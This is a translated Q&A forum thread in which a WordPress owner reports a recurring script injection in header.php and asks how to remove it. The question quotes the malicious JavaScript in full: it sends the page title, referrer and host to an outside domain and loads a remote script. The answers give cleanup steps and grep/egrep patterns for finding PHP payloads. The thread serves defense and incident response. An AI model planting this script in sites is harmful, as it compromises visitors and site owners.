jQuery.min.php我网站上的恶意软件

时间:2015-11-17 10:57:36

标签: php jquery wordpress malware malware-detection

寻找熟悉jquery恶意软件的人的帮助。我已经感染了我的WordPress网站中的注入脚本,每次我从Header.php中删除注入的代码24小时后,它已将其修改后的版本注入我托管服务器上的Header.php文件中。

让我发疯。该网站是www.icrsolutions.co.uk,脚本如下:

<script>
var a = '';
setTimeout(10);
var default_keyword = encodeURIComponent(document.title);
var se_referrer = encodeURIComponent(document.referrer);
var host = encodeURIComponent(window.location.host);
var base = "http://uniluxvfc.com/js/jquery.min.php";
var n_url = base + "?default_keyword=" + default_keyword + "&se_referrer=" + se_referrer + "&source=" + host;
var f_url = base + "?c_utt=snt2014&c_utm=" + encodeURIComponent(n_url);
if (default_keyword !== null && default_keyword !== '' && se_referrer !== null && se_referrer !== '') {
    document.write('<script type="text/javascript" src="' + f_url + '">' + '<' + '/script>');
}
</script>

2 个答案:

答案 0 :(得分:4)

以下内容适用于Joomla:

  1. 更改所有密码。
  2. 将您的安装和任何加载项/模块更新到最新版本。
  3. 识别并清除包含恶意脚本的所有文件。在Linux上,您可以使用以下命令查找文件:grep -r jquery.min.php <webserver directory> | awk -F\: '{ print $1 }'
  4. 清除包含任何“有效负载”的所有文件。在Linux上,您可以使用以下内容来标识这些文件。 会出现误报,因此如有疑问,请根据CMS的新副本检查文件。 egrep -Rl '\$GLOBALS.*\\x|GLO.*SERVER|\$_COOKIE|,"508"|function.*for.*strlen.*isset|isset.*eval' <webserver directory> 2>/dev/null

答案 1 :(得分:1)

更改每个密码,然后删除脚本/恶意代码。

然后,更新每个插件和wordpress本身。